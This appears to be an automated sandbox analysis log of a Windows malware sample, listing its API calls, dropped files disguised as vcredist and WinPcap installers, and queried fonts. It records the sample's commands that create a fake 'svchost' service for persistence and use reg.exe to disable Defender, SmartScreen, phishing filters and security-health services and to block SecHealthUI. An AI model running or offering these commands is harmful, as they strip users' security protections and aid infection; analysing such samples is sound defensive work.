Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_010046B9 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strchr,strrchr,SendDlgItemMessageA,	31_2_010046B9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012B66A3 _memset,_memset,GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,	32_2_012B66A3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_01298BE8 _memset,FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	32_2_01298BE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012B5710 _memset,FindFirstFileW,FindClose,	32_2_012B5710

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_010029C2 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

31_2_010029C2

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012AA0AC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

32_2_012AA0AC

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_01005899 InitializeCriticalSectionAndSpinCount,#17,GetProcessHeap,CreateEventA,CreateEventA,CreateEventA,CreateThread,WaitForSingleObject,SendDlgItemMessageA,Sleep,ShowWindow,SetParent,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,LoadStringA,LoadStringA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,CreateFileA,GetFileSize,ReadFile,CloseHandle,DeleteFileA,SendDlgItemMessageA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,ExpandEnvironmentStringsA,CreateProcessA,ShowWindow,WaitForSingleObject,GetExitCodeProcess,CloseHandle,ShowWindow,LoadStringA,MessageBoxA,DeleteCriticalSection,ExitProcess,

31_2_01005899

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_010062FF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_010062FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012AA0AC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_012AA0AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012A7EAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_012A7EAA

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe" /q /norestart	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe" description svchost "? ???? ??? ?? ?? ???? ?? ?? ?? ??? ?? ???(VPN) ??? ?????. ? ???? ???? ??? ? ???? ????? ??? ?? ???? ???? ????.	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" config svchost start= auto	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" start svchost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\taskkill.exe" /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_01003D02 AllocateAndInitializeSid,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLengthSid,GetTokenInformation,GetLengthSid,

31_2_01003D02

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

31_2_01004F6B

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Users\user\Desktop\ywvz5i8kT9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
